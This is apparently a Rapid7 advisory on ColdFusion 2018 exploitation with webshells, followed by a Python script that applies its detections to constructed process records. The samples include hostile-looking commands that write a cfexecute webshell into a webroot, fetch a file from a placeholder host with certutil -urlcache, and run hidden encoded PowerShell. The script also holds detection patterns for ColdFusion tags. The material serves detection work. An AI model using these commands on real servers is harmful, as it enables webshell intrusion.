Rapid7’s Threat Intelligence and Detection Engineering team has identified active exploitation of Adobe ColdFusion in multiple customer environments. The observed activity dates back to January 2023 and has not been tied back to a specific CVE at this time. Rapid7 has existing detection rules within InsightIDR that have identified this activity and has created additional rules based upon this observed behavior.

We have also observed the compromised website, ooshirtscom, being used in other attacks dating back to March 2022.

The earliest time frame of compromise identified thus far occurred in early January 2023. Rapid7 discovered evidence indicating that a malicious actor dropped webshells using an encoded PowerShell command.

Process start data indicates that ColdFusion 2018 is spawning malicious commands. Example base64-encoded command executed by a malicious actor through ColdFusion:

In our current investigations, previously existing and new detections have been observed triggering post-exploitation across Rapid7 InsightIDR and Managed Detection & Response (MDR) customers:

Webshell - Possible ColdFusion Webshell In Command Line
This detection identifies common ColdFusion tags being passed in the command line. This technique is used by malicious actors when redirecting strings into files while creating webshells.

Attacker Technique - CertUtil With URLCache Flag
This detection identifies the use of the ‘certutil.exe’ binary with the ‘-urlcache’ flag being passed to it. This technique is used by malicious actors to retrieve files hosted on a remote web server and write them to disk.

This technique has been observed by malicious actors redirecting strings into files while creating webshells.

Look for *.cfm files in ColdFusion webroots containing the following ColdFusion tags:
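As an added illustration (this is not Rapid7’s code or InsightIDR’s rule logic), the Python script below applies the two detections described above to process-start records, decoding a PowerShell -EncodedCommand payload before checking it, and performs the webroot hunt for *.cfm files. The ColdFusion tag list, the ColdFusion 2018 install path, the extra parent-process “Context” rule and all sample records are assumptions made for the example; the advisory’s own tag list and example command are not reproduced above.

```python
# Added example (not Rapid7's code): apply the advisory's two detections to process-start
# records, decoding -EncodedCommand PowerShell first, then hunt a webroot for .cfm files.
import base64
import os
import re
import tempfile
from collections import namedtuple

# ASSUMPTION: the advisory's tag list is not reproduced above; these are real ColdFusion
# tags (command execution, file and network access) chosen for the example.
COLDFUSION_TAGS = ("cfexecute", "cffile", "cfhttp", "cfregistry", "cfobject")
TAG_RE = re.compile(r"<\s*(" + "|".join(COLDFUSION_TAGS) + r")\b", re.IGNORECASE)
CERTUTIL_RE = re.compile(r"\bcertutil(?:\.exe)?\b", re.IGNORECASE)
URLCACHE_RE = re.compile(r"[-/]urlcache\b", re.IGNORECASE)  # certutil takes "-" or "/" prefixes
# powershell -e / -ec / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
COLDFUSION_ROOT = "c:\\coldfusion2018\\"  # ASSUMPTION: default ColdFusion 2018 install root
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")

RULE_WEBSHELL = "Webshell - Possible ColdFusion Webshell In Command Line"
RULE_CERTUTIL = "Attacker Technique - CertUtil With URLCache Flag"
RULE_PARENT = "Context - ColdFusion 2018 spawning a command shell"  # assumed, not an advisory rule

ProcessStart = namedtuple("ProcessStart", "parent_image image command_line")

def decode_encoded_powershell(command_line):
    """Script behind a -EncodedCommand argument, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def evaluate(rec):
    """Apply the rules to one process-start record; returns the rule names that fired."""
    hits = []
    decoded = decode_encoded_powershell(rec.command_line)
    texts = [rec.command_line] + ([decoded] if decoded else [])
    if any(TAG_RE.search(t) for t in texts):
        hits.append(RULE_WEBSHELL)
    if CERTUTIL_RE.search(rec.command_line) and URLCACHE_RE.search(rec.command_line):
        hits.append(RULE_CERTUTIL)
    # Split on either separator so Windows paths are handled on any host.
    image_name = rec.image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if rec.parent_image.lower().startswith(COLDFUSION_ROOT) and image_name in SHELLS:
        hits.append(RULE_PARENT)
    return hits

def hunt_cfm_files(webroot):
    """Map each .cfm file under webroot (relative, '/'-separated) to the flagged tags it contains."""
    found = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.lower().endswith(".cfm"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                tags = sorted({m.group(1).lower() for m in TAG_RE.finditer(fh.read())})
            if tags:
                found[os.path.relpath(path, webroot).replace(os.sep, "/")] = tags
    return found

# Constructed sample telemetry, not real data; paths follow the default CF2018 layout.
SAMPLE_SCRIPT = "Set-Content -Path C:\\ColdFusion2018\\cfusion\\wwwroot\\t.cfm -Value '<cfexecute>'"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
CF_PARENT = r"C:\ColdFusion2018\cfusion\bin\coldfusion.exe"
SAMPLES = {
    "echo_redirect": ProcessStart(CF_PARENT, r"C:\Windows\System32\cmd.exe",
        r"cmd.exe /c echo ^<cfexecute^> > C:\ColdFusion2018\cfusion\wwwroot\t.cfm"),
    "certutil_download": ProcessStart(CF_PARENT, r"C:\Windows\System32\cmd.exe",
        r"cmd.exe /c certutil.exe -urlcache -split -f http://example.invalid/a.txt C:\Windows\Temp\a.txt"),
    "encoded_powershell": ProcessStart(CF_PARENT, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -NoP -W Hidden -enc " + SAMPLE_B64),
    "benign_certutil": ProcessStart(r"C:\Windows\explorer.exe", r"C:\Windows\System32\certutil.exe",
        r"certutil.exe -hashfile C:\Users\me\file.txt SHA256"),
}

def run_samples():
    """Evaluate every constructed sample; returns {sample name: [rules fired]}."""
    return {name: evaluate(rec) for name, rec in SAMPLES.items()}

def build_sample_webroot():
    """Create a throwaway webroot of constructed files for hunt_cfm_files to scan."""
    root = tempfile.mkdtemp(prefix="cf_webroot_")
    os.makedirs(os.path.join(root, "uploads"))
    files = {"index.cfm": "<cfoutput>#now()#</cfoutput>",          # ordinary page, no flagged tag
             os.path.join("uploads", "x.cfm"): "<CFEXECUTE>",      # flagged
             os.path.join("uploads", "notes.txt"): "<cfexecute>"}  # not a .cfm file, ignored
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for name, fired in run_samples().items():
        print(f"{name}: {fired or ['no detection']}")
    print(hunt_cfm_files(build_sample_webroot()))
```

Run stand-alone, the script prints which rules each sample record triggers and the flagged file found in the throwaway webroot. In a real deployment the records would come from an EDR or Sysmon process-creation feed, the install root and tag list would be set to the environment’s own, and the parent-process check is only a triage aid: a ColdFusion service that spawns a shell at all is the signal worth reviewing, whatever the command line contains.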